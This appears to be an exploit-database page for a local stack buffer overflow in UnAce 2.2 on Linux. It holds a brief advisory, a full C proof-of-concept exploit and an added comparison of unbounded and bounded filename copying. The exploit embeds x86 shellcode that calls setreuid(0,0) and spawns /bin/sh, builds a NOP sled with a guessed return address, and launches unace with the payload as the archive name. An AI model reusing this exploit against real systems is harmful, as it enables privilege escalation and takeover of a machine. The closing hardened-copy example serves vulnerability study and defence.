Winace UnAce 2.2 – Command Line Argument Buffer Overflow (1)

Vulnerability ID: 1054243   Type: (not listed)
Published: 2003-11-10   Updated: 2003-11-10
CVE ID: N/A
CNNVD-ID: N/A
Platform: Linux   CVSS score: N/A
| Source
https://www.exploit-db.com/exploits/23368
| Details
Vulnerability details have not been disclosed.
| Exploit
source: http://www.securityfocus.com/bid/9002/info

UnAce has been reported to be prone to a buffer overflow vulnerability. The issue presents itself when UnAce handles .ace filenames of excessive length. When such a filename is passed to the UnAce utility as a command-line argument, the string is copied into a fixed-size stack buffer without a length check. Data that exceeds the size of the reserved buffer overflows its bounds and tramples the saved data adjacent to the buffer, including the saved return address. Ultimately this may lead to the execution of arbitrary instructions in the context of the user who is running UnAce.

/* gEEk-unace.c
 *
 * PoC exploit written for the advisory, based on a local stack-based overflow.
 * Vulnerable versions, possibly also earlier ones:
 *
 * Unace v2.2
 *
 * Tested on:  Debian 3.0
 *
 * Advisory source: MegaHz
 * http://www.securityfocus.com/archive/1/344065/2003-11-07/2003-11-13/0
 *
 * -----------------------------------------
 * coded by: demz (geekz.nl) ([email protected])
 * -----------------------------------------
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Linux/x86 shellcode: setreuid(0, 0); execve("//bin/sh", {"//bin/sh", NULL}, NULL); exit().
 * It contains no NUL bytes, so it survives being passed inside an argv string. */
char shellcode[]=

        "\x31\xc0"                      // xor          eax, eax
        "\x31\xdb"                      // xor          ebx, ebx
        "\x31\xc9"                      // xor          ecx, ecx
        "\xb0\x46"                      // mov          al, 70        (setreuid)
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\x50"                          // push         eax           (string terminator)
        "\x68\x6e\x2f\x73\x68"          // push  long   0x68732f6e    ("n/sh")
        "\x68\x2f\x2f\x62\x69"          // push  long   0x69622f2f    ("//bi")
        "\x89\xe3"                      // mov          ebx, esp      (pathname "//bin/sh")
        "\x50"                          // push         eax           (argv[1] = NULL)
        "\x53"                          // push         ebx           (argv[0])
        "\x89\xe1"                      // mov          ecx, esp      (argv)
        "\x99"                          // cdq                        (edx = envp = NULL)
        "\xb0\x0b"                      // mov          al, 11        (execve)
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\xb0\x01"                      // mov          al, 1         (exit)
        "\xcd\x80";                     // int          0x80

int main(void)
{
        /* Guessed address of the NOP sled on the target's stack; adjust per target. */
        unsigned long ret = 0xbfffc260;

        /* 707 bytes of NOP sled (shellcode embedded at offset 300), 4-byte return
         * address at offset 707, NUL terminator at 711: 712 bytes in total. */
        char buffer[712];
        size_t i;

        memset(buffer, 0x90, sizeof(buffer));

        /* Copy the whole shellcode (the original loop dropped its last byte). */
        for (i = 0; i < strlen(shellcode); i++)
                buffer[300 + i] = shellcode[i];

        /* Overwrite the saved return address, little-endian. */
        buffer[707] = (ret & 0x000000ff);
        buffer[708] = (ret & 0x0000ff00) >> 8;
        buffer[709] = (ret & 0x00ff0000) >> 16;
        buffer[710] = (ret & 0xff000000) >> 24;
        buffer[711] = 0x0;

        printf("\nUnace v2.2 local exploit\n");
        printf("---------------------------------------- demz @ geekz.nl --\n");

        /* Hand the payload to unace as the archive filename: unace e <payload> */
        execl("./unace", "unace", "e", buffer, (char *)NULL);

        /* execl only returns on failure. */
        perror("execl");
        return 1;
}
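The advisory describes the bug class only in prose, and the PoC above shows just the attacker's side (a 711-byte argument with the return address at offset 707). The following is an added example, not UnAce source and not part of the original advisory or PoC: it puts the unbounded argv-to-stack-buffer copy the advisory describes next to a bounded version that rejects oversize archive names instead of overflowing. The buffer size (256) and the function names are assumptions for illustration; UnAce's real buffer size is not given on the page.

```c
/* Archive-name handling, vulnerable pattern vs. hardened form.
 * Added example; not UnAce source. NAME_BUF is an assumed size. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed capacity of the fixed-size name buffer (UnAce's real size is unknown). */
#define NAME_BUF 256

/* Vulnerable pattern (the bug class behind this advisory): the argv[] string is
 * copied into a fixed stack buffer with no length check. With strlen(arg) >= NAME_BUF
 * the copy runs past name[] into whatever the compiler placed above it, typically the
 * saved frame pointer and the saved return address. Kept for comparison only; it is
 * never called with untrusted input here. */
static void copy_name_unbounded(const char *arg)
{
        char name[NAME_BUF];
        strcpy(name, arg);                 /* no bound: the overflow happens here */
        printf("archive: %s\n", name);
}

/* Hardened form: refuse anything that does not fit, terminator included.
 * memchr() limits the scan to the destination size, so an oversize or unterminated
 * argument can neither overflow dst nor be read past. Returns 0 on success, -1 if
 * arg is too long. Rejecting is preferable to silent truncation, which would make
 * the tool operate on a different filename than the one the user supplied. */
static int copy_name_bounded(const char *arg, char *dst, size_t dstsz)
{
        const char *nul = memchr(arg, '\0', dstsz);
        if (nul == NULL)                   /* no terminator within dstsz: too long */
                return -1;
        memcpy(dst, arg, (size_t)(nul - arg) + 1);
        return 0;
}

/* Does an archive-name argument of `len` bytes fit? Builds a constructed argument
 * of that length (all 'A') and runs it through the bounded copy.
 * Returns 1 if accepted, 0 if rejected. */
int name_of_length_fits(size_t len)
{
        char dst[NAME_BUF];
        char *arg = malloc(len + 1);
        int rc;

        if (arg == NULL)
                return 0;
        memset(arg, 'A', len);
        arg[len] = '\0';
        rc = copy_name_bounded(arg, dst, sizeof dst);
        free(arg);
        return rc == 0;
}

int main(int argc, char **argv)
{
        char dst[NAME_BUF];

        /* Same invocation shape as the PoC: unace e <archive> */
        if (argc != 3 || strcmp(argv[1], "e") != 0) {
                fprintf(stderr, "usage: %s e <archive.ace>\n", argv[0]);
                return 2;
        }
        if (copy_name_bounded(argv[2], dst, sizeof dst) != 0) {
                fprintf(stderr, "archive name too long (max %d bytes)\n", NAME_BUF - 1);
                return 1;
        }
        printf("archive: %s\n", dst);

        (void)copy_name_unbounded;         /* shown for contrast, deliberately unused */
        return 0;
}
```

Fed the PoC's 711-byte argument, the bounded version exits with an error before any copy takes place; the unbounded version would copy all 711 bytes into a 256-byte frame slot, which is exactly what lets the four bytes at offset 707 replace the saved return address.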
